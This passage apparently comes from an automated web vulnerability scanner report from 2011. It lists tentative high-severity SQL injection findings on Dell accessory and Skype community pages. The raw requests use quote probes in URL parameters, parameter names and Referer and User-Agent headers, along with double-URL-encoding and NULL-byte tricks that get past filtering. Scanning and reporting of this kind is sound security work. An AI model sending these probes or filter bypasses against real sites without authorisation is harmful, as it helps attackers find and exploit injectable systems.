<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...
ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div>
...[SNIP]...

Request 2

GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23596
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...

1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sna/productdetail.aspx?sku=&1%00'=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25481
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:36 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...
ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div>
...[SNIP]...

Request 2

GET /sna/productdetail.aspx?sku=&1%00''=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...

1.3. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Android'/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 244364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/Android''/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.4. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/English/ct-p/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/English/ct-p/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 173560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 176531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-Manager/bd-p/Skype_Manager

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Skype-Manager/bd-p/Skype_Manager?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-Manager/bd-p/Skype_Manager?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.8. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-for-Business/bd-p/pt_business

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Skype-for-Business/bd-p'/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-for-Business/bd-p''/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...

1.9. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 162175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.10. http://community.skype.com/t5/Support-et-information/bd-p/fr_community [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Support-et-information/bd-p/fr_community

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Support-et-information/bd-p%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Support-et-information/bd-p%2527%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...

1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.12. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84539

